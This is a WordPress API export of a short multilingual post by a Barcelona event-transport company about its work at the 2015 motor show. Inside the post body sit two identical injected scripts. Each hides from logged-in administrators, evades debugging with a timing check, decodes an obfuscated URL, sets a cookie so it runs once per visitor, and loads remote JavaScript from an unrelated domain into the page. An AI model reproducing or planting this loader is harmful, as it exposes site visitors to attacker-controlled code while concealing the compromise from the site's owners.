{"id":1036,"date":"2015-05-02T12:33:03","date_gmt":"2015-05-02T10:33:03","guid":{"rendered":"http:\/\/www.weservices.es\/ca\/?p=1036"},"modified":"2026-04-27T10:19:08","modified_gmt":"2026-04-27T10:19:08","slug":"salon-de-automovil-un-classic-de-barcelona","status":"publish","type":"post","link":"https:\/\/weservices.es\/en\/salon-de-automovil-un-classic-de-barcelona\/","title":{"rendered":"[:es]Sal\u00f3n de Automovil, un cl\u00e0ssic de Barcelona[:en]Motor show 2015, a Barcelona classic[:ca]Sal\u00f3n del Automovil, un cl\u00e0ssic de Barcelona[:]"},"content":{"rendered":"<p>[:es]Una de la banderas en Fira de Barcelona, WE Services incrementa el n\u00famero de servicios de manipulaci\u00f3n on-site a\u00f1o tras a\u00f1o.[:en]<span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"hps\">One of<\/span> <span class=\"hps\">the<\/span> <span class=\"hps\">flags<\/span> <span class=\"hps\">at<\/span> <span class=\"hps\">Fira de Barcelona,<\/span> <span class=\"hps\">WE<\/span> <span class=\"hps\">Services<\/span> <span class=\"hps\">increases<\/span> <span class=\"hps\">the<\/span> <span class=\"hps\">number<\/span> <span class=\"hps\">of<\/span> o<span class=\"hps\">n-site<\/span> <span class=\"hps\">services<\/span> year after year.<\/span>[:ca]<span id=\"result_box\" class=\"\" lang=\"ca\"><span class=\"hps\">Una<\/span> <span class=\"hps\">de<\/span> <span class=\"hps\">la banderes<\/span> <span class=\"hps\">a Fira de Barcelona<\/span>, <span class=\"hps\">WE Services<\/span> <span class=\"hps\">incrementa<\/span> <span class=\"hps\">el n\u00famero<\/span> <span class=\"hps\">de serveis<\/span> <span class=\"hps\">de<\/span> <span class=\"hps\">manipulaci\u00f3<\/span> on-site any rere any.<br \/>\n<\/span>[:]<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>[:es]Una de la banderas en Fira de Barcelona, WE Services incrementa el n\u00famero de servicios de manipulaci\u00f3n on-site a\u00f1o tras a\u00f1o.[:en]One of the flags at Fira de Barcelona, WE Services increases the number of on-site services year after year.[:ca]Una de la banderes a Fira de Barcelona, WE Services incrementa el n\u00famero de serveis de manipulaci\u00f3 [&hellip;]<\/p>","protected":false},"author":2,"featured_media":1037,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>[:es]Sal\u00f3n de Automovil, un cl\u00e0ssic de Barcelona[:en]Motor show 2015, a Barcelona classic[:ca]Sal\u00f3n del Automovil, un cl\u00e0ssic de Barcelona[:] - We Services<\/title>\n<meta name=\"description\" content=\"Una de la banderas en Fira de Barcelona, WE Services incrementa el n\u00famero de servicios de manipulaci\u00f3n on-site a\u00f1o tras a\u00f1o.One of the flags at Fira de\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/weservices.es\/en\/salon-de-automovil-un-classic-de-barcelona\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[:es]Sal\u00f3n de Automovil, un cl\u00e0ssic de Barcelona[:en]Motor show 2015, a Barcelona classic[:ca]Sal\u00f3n del Automovil, un cl\u00e0ssic de Barcelona[:] - We Services\" \/>\n<meta property=\"og:description\" content=\"Una de la banderas en Fira de Barcelona, WE Services incrementa el n\u00famero de servicios de manipulaci\u00f3n on-site a\u00f1o tras a\u00f1o.One of the flags at Fira de\" \/>\n<meta property=\"og:url\" content=\"https:\/\/weservices.es\/en\/salon-de-automovil-un-classic-de-barcelona\/\" \/>\n<meta property=\"og:site_name\" content=\"We Services\" \/>\n<meta property=\"article:published_time\" content=\"2015-05-02T10:33:03+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-27T10:19:08+00:00\" \/>\n<meta name=\"author\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/\",\"url\":\"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/\",\"name\":\"[:es]Sal\u00f3n de Automovil, un cl\u00e0ssic de Barcelona[:en]Motor show 2015, a Barcelona classic[:ca]Sal\u00f3n del Automovil, un cl\u00e0ssic de Barcelona[:] - We Services\",\"isPartOf\":{\"@id\":\"https:\/\/weservices.es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/#primaryimage\"},\"thumbnailUrl\":\"\",\"datePublished\":\"2015-05-02T10:33:03+00:00\",\"dateModified\":\"2026-04-27T10:19:08+00:00\",\"author\":{\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\"},\"description\":\"Una de la banderas en Fira de Barcelona, WE Services incrementa el n\u00famero de servicios de manipulaci\u00f3n on-site a\u00f1o tras a\u00f1o.One of the flags at Fira de\",\"breadcrumb\":{\"@id\":\"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/#primaryimage\",\"url\":\"\",\"contentUrl\":\"\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/weservices.es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[:es]Sal\u00f3n de Automovil, un cl\u00e0ssic de Barcelona[:en]Motor show 2015, a Barcelona classic[:ca]Sal\u00f3n del Automovil, un cl\u00e0ssic de Barcelona[:]\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/weservices.es\/#website\",\"url\":\"https:\/\/weservices.es\/\",\"name\":\"We Services\",\"description\":\"Transport for fairs and events\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/weservices.es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\",\"name\":\"JOSE ANTONIO GARCIA SANCHEZ\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"caption\":\"JOSE ANTONIO GARCIA SANCHEZ\"},\"url\":\"https:\/\/weservices.es\/en\/author\/jo\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[:es]Sal\u00f3n de Automovil, un cl\u00e0ssic de Barcelona[:en]Motor show 2015, a Barcelona classic[:ca]Sal\u00f3n del Automovil, un cl\u00e0ssic de Barcelona[:] - We Services","description":"Una de la banderas en Fira de Barcelona, WE Services incrementa el n\u00famero de servicios de manipulaci\u00f3n on-site a\u00f1o tras a\u00f1o.One of the flags at Fira de","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/weservices.es\/en\/salon-de-automovil-un-classic-de-barcelona\/","og_locale":"en_US","og_type":"article","og_title":"[:es]Sal\u00f3n de Automovil, un cl\u00e0ssic de Barcelona[:en]Motor show 2015, a Barcelona classic[:ca]Sal\u00f3n del Automovil, un cl\u00e0ssic de Barcelona[:] - We Services","og_description":"Una de la banderas en Fira de Barcelona, WE Services incrementa el n\u00famero de servicios de manipulaci\u00f3n on-site a\u00f1o tras a\u00f1o.One of the flags at Fira de","og_url":"https:\/\/weservices.es\/en\/salon-de-automovil-un-classic-de-barcelona\/","og_site_name":"We Services","article_published_time":"2015-05-02T10:33:03+00:00","article_modified_time":"2026-04-27T10:19:08+00:00","author":"JOSE ANTONIO GARCIA SANCHEZ","twitter_card":"summary_large_image","twitter_misc":{"Written by":"JOSE ANTONIO GARCIA SANCHEZ"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/","url":"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/","name":"[:es]Sal\u00f3n de Automovil, un cl\u00e0ssic de Barcelona[:en]Motor show 2015, a Barcelona classic[:ca]Sal\u00f3n del Automovil, un cl\u00e0ssic de Barcelona[:] - We Services","isPartOf":{"@id":"https:\/\/weservices.es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/#primaryimage"},"image":{"@id":"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/#primaryimage"},"thumbnailUrl":"","datePublished":"2015-05-02T10:33:03+00:00","dateModified":"2026-04-27T10:19:08+00:00","author":{"@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b"},"description":"Una de la banderas en Fira de Barcelona, WE Services incrementa el n\u00famero de servicios de manipulaci\u00f3n on-site a\u00f1o tras a\u00f1o.One of the flags at Fira de","breadcrumb":{"@id":"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/#primaryimage","url":"","contentUrl":""},{"@type":"BreadcrumbList","@id":"https:\/\/weservices.es\/salon-de-automovil-un-classic-de-barcelona\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/weservices.es\/"},{"@type":"ListItem","position":2,"name":"[:es]Sal\u00f3n de Automovil, un cl\u00e0ssic de Barcelona[:en]Motor show 2015, a Barcelona classic[:ca]Sal\u00f3n del Automovil, un cl\u00e0ssic de Barcelona[:]"}]},{"@type":"WebSite","@id":"https:\/\/weservices.es\/#website","url":"https:\/\/weservices.es\/","name":"We Services","description":"Transport for fairs and events","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/weservices.es\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b","name":"JOSE ANTONIO GARCIA SANCHEZ","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","caption":"JOSE ANTONIO GARCIA SANCHEZ"},"url":"https:\/\/weservices.es\/en\/author\/jo\/"}]}},"_links":{"self":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1036"}],"collection":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/comments?post=1036"}],"version-history":[{"count":2,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1036\/revisions"}],"predecessor-version":[{"id":3216,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1036\/revisions\/3216"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/media?parent=1036"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/categories?post=1036"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/tags?post=1036"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}